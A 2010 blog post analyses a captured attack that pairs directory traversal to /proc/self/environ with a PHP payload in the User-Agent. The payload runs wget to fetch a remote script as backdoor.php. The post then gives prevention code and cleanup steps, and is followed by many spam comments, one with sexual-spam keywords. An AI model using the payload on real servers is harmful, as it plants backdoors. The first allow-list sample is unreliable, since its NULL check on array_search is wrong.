Friday, June 25, 2010

The proc/self/environ Injection

Event Details


Date
21 June 2010

POST Values
file: ../../proc/self/environ

SERVER Values
HTTP_USER_AGENT: <? exec(\"wget http://[remotescript].txt -O backdoor.php\"); ?>
This is a simplified version of what was captured in the user agent field.

What the hacker was hoping for
What we have hear is a local file injection attack coupled with injected PHP code.

The visitor hopes that my code that handles file inclusion is written something like this:
<?php
// Include file requested
include($_GET['file']);
?>


Thus the file that will be included would be:

/var/www/../../proc/self/environ (which equates to /proc/self/environ)

The hacker is attempting to include the proc details about the current Apache thread. /proc/ contains information about all the running threads, /proc/self/ contains the current thread being run). Apache stores various values in the /proc/self/environ (environment variables) such as the visitors IP address, user agent, script called and other values like this:


DOCUMENT_ROOT=/var/www GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID= HTTP_HOST=www.example.com HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) PATH=/bin:/usr/bin QUERY_STRING= REMOTE_ADDR=x.x.x.x REMOTE_PORT=xxxx REQUEST_METHOD=GET REQUEST_URI=/index.php SCRIPT_FILENAME=/var/www/index.php SCRIPT_NAME=/index.php SERVER_ADDR=x.x.x.x SERVER_ADMIN=webmaster@example.com SERVER_NAME=www.example.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.1 SERVER_SIGNATURE=
Apache/2.0 (Unix)


However, since the hacker has set his own custom User-Agent (HTTP_USER_AGENT), that will be included and executed as PHP code. The PHP code would then execute shell commands to retrieve a remote script, download it to the server and place it in the website folder:

<?
// Fetch remote script and place in /tmp/dump
exec("wget http://[remotescript].txt -O backdoor.php");
>


Now the hacker can now visit his page and run any commands he wants on your webserver.

http://www.example.com/backdoor.php

How to prevent this

  • Sanitize your inputs
    • Ensure that directory traversal is disabled/checked for
    • Work with an allowed list of files

      $allowed_files = array('file1.php', 'file2.php');
      $allowed_index = array_search($_GET['file'], $allowed_files)
      if ($allowed_index !== NULL)
      {
      include $allowed_files[$allowed_index];
      }


    • Don't allow visitors to specify by name

      $allowed_files = array('file1' => 'file1.php', 'file2' => 'file2.php');
      if (!empty($allowed_files[$_GET['file']]))
      {
      include $allowed_files[$_GET['file']];
      }



Threat Level
High

Course of Action

If this has happened to you, do the following:
  • Take the server offline (if possible)
  • Check active process list for unknown scripts and kill them
  • Patch/Fix the file inclusion vulnerability (update your web application with the latest version)
  • Check your httpd/apache logs (located in either /var/log/httpd/ or /var/log/apache/ folders) for visits from the hacker to determine his IP address(es) and pinpoint which scripts he was hitting (to identify backdoors)
  • Remove backdoor scripts
  • Monitor you logs. The hacker will probably return and attempt to reinfect your server.

38 comments:

  1. Replies
    1. Great Article Cyber Security Projects projects for cse Networking Security Projects JavaScript Training in Chennai JavaScript Training in Chennai The Angular Training covers a wide range of topics including Components, Angular Directives, Angular Services, Pipes, security fundamentals, Routing, and Angular programmability. The new Angular TRaining will lay the foundation you need to specialise in Single Page Application developer. Angular Training

      Delete
  2. I appreciate your efforts because it conveys the message of what you are trying to say. It's a great skill to make even the person who doesn't know about the subject could able to understand the subject . Your blogs are understandable and also elaborately described. I hope to read more and more interesting articles from your blog. All the best.

    rpa training in bangalore
    best rpa training in bangalore
    RPA training in bangalore
    rpa course in bangalore
    rpa training in chennai
    rpa online training

    ReplyDelete
  3. Some us know all relating to the compelling medium you present powerful steps on this blog and therefore strongly encourage contribution from other ones on this subject while our own child is truly discovering a great deal. Have fun with the remaining portion of the year.
    python training Course in chennai
    python training in Bangalore
    Python training institute in bangalore

    ReplyDelete

  4. Whoa! I’m enjoying the template/theme of this website. It’s simple, yet effective. A lot of times it’s very hard to get that “perfect balance” between superb usability and visual appeal. I must say you’ve done a very good job with this.

    AWS Training in Bangalore | Best AWS Amazon Web Services…
    Amazon Web Services (AWS) Training in Pune India
    AWS Training | AWS Training and Certification | AWS online training
    AWS Training in Bangalore cost| Aws training in Bangalore with placements

    ReplyDelete
  5. Hi, Great.. Tutorial is just awesome..It is really helpful for a newbie like me.. I am a regular follower of your blog. Really very informative post you shared here. Kindly keep blogging.
    AWS Training in pune

    AWS Online Training

    AWS Training in Bangalore

    ReplyDelete
  6. Great post. I was once checking constantly this weblog and I'm impressed! Extremely useful information specially the closing part. I maintain such information much. I was once seeking this specific information for a very long time. Many thanks and best of luck.
    samsung mobile service center in velachery
    samsung mobile service center in porur
    samsung mobile service center in vadapalani

    ReplyDelete
  7. nice blog
    get best placement at VSIPL

    digital marketing services
    web development company
    seo network point

    ReplyDelete
  8. nice blog
    get best placement at VSIPL

    get digital marketing services
    seo network point

    ReplyDelete
  9. nice blog
    get best placement at VSIPL

    get digital marketing services
    seo network point

    ReplyDelete

  10. Click here to cloud tech.
    .......................................................

    ReplyDelete
  11. Thanks for the informative article About AWS.This is one of the best resources I have found in quite some time. Nicely written and great info. I really cannot thank you enough for sharing.
    Java training in chennai | Java training in annanagar | Java training in omr | Java training in porur | Java training in tambaram | Java training in velachery

    ReplyDelete
  12. Thanks for post.I do agree your blog for quiz programming concepts, which is very helpful to grow up your knowledge. keep sharing more

    aws training in chennai | aws training in annanagar | aws training in omr | aws training in porur | aws training in tambaram | aws training in velachery

    ReplyDelete
  13. This is really a very good article about Java.Thanks for taking the time to discuss with us , I feel happy about learning this topic.
    AWS training in chennai | AWS training in annanagar | AWS training in omr | AWS training in porur | AWS training in tambaram | AWS training in velachery


    ReplyDelete
  14. This is really a very good article about Java.Thanks for taking the time to discuss with us , I feel happy about learning this topic.
    AWS training in chennai | AWS training in annanagar | AWS training in omr | AWS training in porur | AWS training in tambaram | AWS training in velachery


    ReplyDelete
  15. I found your blog while searching for the updates, I am happy to be here. Very useful content and also easily understandable providing.. Believe me I did wrote an post about tutorials for beginners with reference of your blog.

    Aws Training in Chennai

    Aws Training in Velachery

    Aws Training in Tambaram

    Aws Training in Porur

    Aws Training in Omr

    Aws Training in Annanagar

    ReplyDelete
  16. I have been searching to find a comfort or effective procedure to complete this process and I think this is the most suitable way to do it effectively. ExcelR Data Science Course In Pune

    ReplyDelete
  17. Cliff Saunders has spent over 20 years as a student of health and wellness and writes about various treatment modalitieskamapisachi nude anveshi jain nude tamanna sex kajal agarwal xxx simran kaur nude disha patani nude actress nude disha patani boobs rashmika mandanna nude

    ReplyDelete
  18. Informative and useful article with detailed explanation. Thanks for sharing Angular training in Chennai

    ReplyDelete
  19. Thanks for sharing the detailed content with all of us, keep writing.
    Data Science Training in Pune

    ReplyDelete
  20. I recently came across your article and have been reading along. I want to express my admiration of your writing skill and ability to make readers read from the beginning to the end.
    Python Classes in Pune

    ReplyDelete
  21. Amazing Articles ! I would like to thank you for the efforts you had made for writing this awesome article. This article inspired me to read more. keep it up.If you are Searching for info click on given link
    Data science course in pune

    ReplyDelete
  22. .You can put a smile on my face even when I don’t feel like smiling at all
    .I think it’s the most amazing thing about our friendship
    .We make each other laugh all the time
    .And it helps a lot to live a life full of complicated stuff
    .Love you, buddy. دانلود آهنگ سهراب پاکزاد نور چشمی

    ReplyDelete